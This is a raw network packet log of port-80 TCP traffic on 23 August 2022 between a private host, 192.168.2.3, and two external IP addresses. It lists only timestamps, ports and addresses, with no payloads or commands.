Aug 23, 2022 18:24:03.740045071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740058899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740063906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740219116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740242958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740365028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740411043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740418911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740442991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740544081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740688086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740694046 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740807056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740834951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.740856886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741053104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741066933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741072893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741095066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741117954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741141081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741154909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741173983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741211891 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741216898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741231918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741255999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741378069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741395950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741417885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741446972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741466999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741480112 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741485119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741547108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741574049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741610050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741672039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741728067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741739988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741767883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741796017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741822958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741847038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741852045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741854906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741867065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741904974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.741962910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.741967916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742002964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742028952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742057085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742078066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742130041 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742136002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742139101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742173910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742254972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742275953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742332935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742345095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742350101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742373943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742428064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742440939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742480993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742528915 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742556095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742587090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742594957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742599010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.742646933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742687941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742724895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.742737055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.746880054 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.073378086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.084410906 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.084583998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.107601881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.156743050 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.164880037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.197207928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197272062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197293997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197314024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197391987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.197432041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.197457075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197516918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.197568893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197635889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197663069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.197696924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.197699070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197767019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197789907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.197819948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.197854042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.202779055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.202821970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.202893019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.202951908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.202974081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.202980042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.202985048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203053951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203063011 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203213930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203242064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203265905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203291893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203377008 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203459978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203483105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203527927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203557968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203571081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203636885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203821898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203887939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.203946114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203955889 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.203974009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204102993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204138041 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204293013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204349995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204370022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204412937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204438925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204503059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204528093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204571009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204638004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204638958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204796076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204835892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204883099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.204915047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204932928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204942942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.204977989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205054998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205110073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205167055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205183983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205321074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205430984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205457926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205518961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205523968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205528021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205532074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205653906 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205734968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205765009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205811977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205837011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205883026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.205914021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205929995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205938101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.205956936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206002951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206037998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206135035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206176043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206249952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206278086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206298113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206304073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206305981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206398964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206429958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206446886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206581116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206614971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206639051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206667900 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206688881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206708908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206749916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206782103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206854105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206866026 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.206871033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206931114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.206934929 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207014084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207132101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207173109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207199097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207279921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207308054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207331896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207386017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207416058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207423925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207431078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207515955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207559109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207663059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207690001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207715988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207745075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207777023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207783937 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.207822084 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.207958937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208026886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.208034039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208113909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208211899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.208276033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208460093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208602905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208637953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208683014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.208686113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208754063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208782911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.208900928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.208930016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.209153891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.209182978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.209243059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.209273100 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.209276915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.209290028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.209355116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.209413052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.209431887 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.209721088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.210987091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211019039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211098909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211117983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211216927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211247921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211272955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211302042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211311102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211385965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211400032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211421013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211452007 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211478949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211529970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211546898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211555958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211560011 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211579084 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211643934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211674929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211703062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211711884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211723089 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211777925 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211786032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.211898088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211927891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211956978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.211970091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212059975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212091923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212127924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212132931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212163925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212210894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212239981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212263107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212269068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212330103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212367058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212383986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212405920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212445974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212599993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212615967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212646961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212676048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212685108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212693930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212764978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212790966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212810040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.212860107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.212934017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213035107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213089943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213118076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213148117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213172913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213186979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213193893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213211060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213262081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213319063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213340998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213371038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213399887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213491917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213515997 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213709116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213777065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.213804960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.213835001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214005947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214035988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214126110 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214137077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214205980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214220047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214247942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214272976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214318037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214335918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214343071 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214360952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214433908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214456081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214622021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214684010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214811087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214840889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.214890957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214909077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214915991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.214936972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:04.215111971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.215166092 CEST	80	49844	77.91.103.222	192.168.2.3
